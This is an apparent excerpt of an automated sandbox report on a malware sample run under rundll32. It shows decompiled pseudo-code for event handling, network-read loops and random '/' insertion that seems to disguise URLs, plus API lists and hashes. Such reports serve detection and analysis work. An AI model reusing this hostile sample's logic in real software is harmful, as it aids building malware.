                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E047B748A(_a16, _a4);
                                          						E047B2FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L047BB088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L047BB082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E047B6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E047B15CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E047B687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x47bd1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}






















                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047B7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047B7727
                                          • memset.NTDLL ref: 047B77C7
                                          • memset.NTDLL ref: 047B77D7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 8913039eae67d7ef9cd30a94f903049f3b6c0aa6c229d8d5a8670b36ccbc1804
                                          • Instruction ID: 16f8211db9a4bbc3529dc02d37dafda6e6443ffca43494bbb56d428a33266f7e
                                          • Opcode Fuzzy Hash: 8913039eae67d7ef9cd30a94f903049f3b6c0aa6c229d8d5a8670b36ccbc1804
                                          • Instruction Fuzzy Hash: A1419671600249ABDB14EFA8CC48FEE7779EF84314F108569F955AB380EB70B9558BD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 047BA97E
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • ResetEvent.KERNEL32(?), ref: 047BA9F2
                                          • GetLastError.KERNEL32 ref: 047BAA15
                                          • GetLastError.KERNEL32 ref: 047BAAC0
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: bca94519c941a9398d347864684aa461429b0014b3cbfc7e6562183d14127c3c
                                          • Instruction ID: 24de781b67a63db2ec4cd6d9874172a92859ebb88d273cc99da9372a4a27119e
                                          • Opcode Fuzzy Hash: bca94519c941a9398d347864684aa461429b0014b3cbfc7e6562183d14127c3c
                                          • Instruction Fuzzy Hash: 63418271500608BFE731AFA1CD48FDB7BBDEB88700F148929F582E1290E775A904DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E047B8F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x47bd138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x47bd168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E047B58BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x47bd138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E047B147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E047B16DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E047B9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E047B9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}















                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 047B8F1E
                                          • GetLastError.KERNEL32 ref: 047B8F37
                                            • Part of subcall function 047B9D3A: WaitForMultipleObjects.KERNEL32(00000002,047BAA33,00000000,047BAA33,?,?,?,047BAA33,0000EA60), ref: 047B9D55
                                          • ResetEvent.KERNEL32(?), ref: 047B8FB0
                                          • GetLastError.KERNEL32 ref: 047B8FCB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 212f1f9175f80a36535b481266831d404f006dd6f14025bf31da375e82cf1aa1
                                          • Instruction ID: 9ebd8255aa14f5c8e77564fa765c43991f22416eea18384a379a8c5f4cf5c5db
                                          • Opcode Fuzzy Hash: 212f1f9175f80a36535b481266831d404f006dd6f14025bf31da375e82cf1aa1
                                          • Instruction Fuzzy Hash: 0F31D6B2600A05AFDB229FA5CC44FDE77B9EF88350F114918E3A197250EA70F9419790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E047B72F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x47bd270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t3 = _t8 + 0x47be836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E047B6AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x47bd2a8, 1, 0, _t30);
                                          					E047B147E(_t30);
                                          				}
                                          				_t12 =  *0x47bd25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047B56A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E047B1493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x47bd110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E047B7827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}















                                          APIs
                                            • Part of subcall function 047B6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,047B2098,74666F53,00000000,?,047BD00C,?,?), ref: 047B6B2D
                                            • Part of subcall function 047B6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 047B6B51
                                            • Part of subcall function 047B6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 047B6B59
                                          • CreateEventA.KERNEL32(047BD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B7333
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,047B555B,00000000,00000000,?,00000000,?,047B555B,?,?,?), ref: 047B7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B73D9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: e51c06ecfd10900de20253f5aed7a7045ad593318bfa9b85b180b921db4c9b23
                                          • Instruction ID: 8c1de1394f363d13f315d8c32b487ecf5f584bef68a2fad81b6d47fe88ef1776
                                          • Opcode Fuzzy Hash: e51c06ecfd10900de20253f5aed7a7045ad593318bfa9b85b180b921db4c9b23
                                          • Instruction Fuzzy Hash: F721C1326007929BD7355EA89C84FEA73A9EBC4714B054635FDD2DB340DB65EC0186D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E047BA1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x47bd140; // 0x47bad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E047B58BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E047B147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E047B9D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}
















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 047BA208
                                          • SetEvent.KERNEL32(?), ref: 047BA218
                                          • GetLastError.KERNEL32 ref: 047BA2A1
                                            • Part of subcall function 047B9D3A: WaitForMultipleObjects.KERNEL32(00000002,047BAA33,00000000,047BAA33,?,?,?,047BAA33,0000EA60), ref: 047B9D55
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • GetLastError.KERNEL32(00000000), ref: 047BA2D6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 45ee2e6b8bc6fd77105fc6e3fe8c772a8e63f63c1031149e8b3ff8a07b8bc6e8
                                          • Instruction ID: 6025148ba3771f0556709176d967dc133f7bb554151ff8f69242974bdd41f7b3
                                          • Opcode Fuzzy Hash: 45ee2e6b8bc6fd77105fc6e3fe8c772a8e63f63c1031149e8b3ff8a07b8bc6e8
                                          • Instruction Fuzzy Hash: C9312975A00309EFDB21EFD5C984ADEB7B8EB48304F108969D581A2240D735AA459F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E047B54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E047B4F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E047B5749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E047B9138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x47bd2a8, 1, 0,  *0x47bd340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E047B9575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E047BA642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E047B568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E047B72F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(047BD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 047B54FD
                                          • SetEvent.KERNEL32(00000000), ref: 047B550A
                                          • Sleep.KERNEL32(00000BB8), ref: 047B5515
                                          • CloseHandle.KERNEL32(00000000), ref: 047B551C
                                            • Part of subcall function 047B9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,047B553C,?,047B553C,?,?,?,?,?,047B553C,?), ref: 047B964F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 7bbda241f8dd99541bc10c84eed32fa3707901401ad644d1bc87349eed14f3ff
                                          • Instruction ID: 10ef377cb368f8a52d29b437b491f26e3adac498905ddc1a99493160caa83408
                                          • Opcode Fuzzy Hash: 7bbda241f8dd99541bc10c84eed32fa3707901401ad644d1bc87349eed14f3ff
                                          • Instruction Fuzzy Hash: D7212472D00119BBDB10AFE5D888BDE777BEF44359B05C425EA92B7200D674BA418BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E047B1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0;
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E047B58BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 3a859eba638ccf9270f1fe223ddcaca21ff1ba17e15a1c83d8f4c8996773a53d
                                          • Instruction ID: 4bc1a9663db5464068384c5a2173ca8e9e3e4defd5e5210590eec770521bf8dc
                                          • Opcode Fuzzy Hash: 3a859eba638ccf9270f1fe223ddcaca21ff1ba17e15a1c83d8f4c8996773a53d
                                          • Instruction Fuzzy Hash: B2214175901609EFDB11DFA4D998EDEBBB8FF48344B5085A9E981E7300E730EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E047B4858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x47bd238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x47bd250; // 0xbcde7f96
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x47bd250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047B4DBF,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,047B4DBF,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 047B48E0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 1ac5fa6890403896dc3c6c13b597d54f97da063170deee5ff955a6ed865c2fc6
                                          • Instruction ID: 8fc0b52b40c43a9a9c500524adb0676c0758eae8f79fdfbdd31343c5460c5bd4
                                          • Opcode Fuzzy Hash: 1ac5fa6890403896dc3c6c13b597d54f97da063170deee5ff955a6ed865c2fc6
                                          • Instruction Fuzzy Hash: 8911C2B2A00158AFD715CE69DD88EDEBBEEEBD4260B05417AF5449B241E774AE00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E047B6AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E047B6F89(_t8, _t1);
                                          				_t16 = E047B58BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E047B9038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E047B58BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E047B147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                            • Part of subcall function 047B9038: wsprintfA.USER32 ref: 047B9094
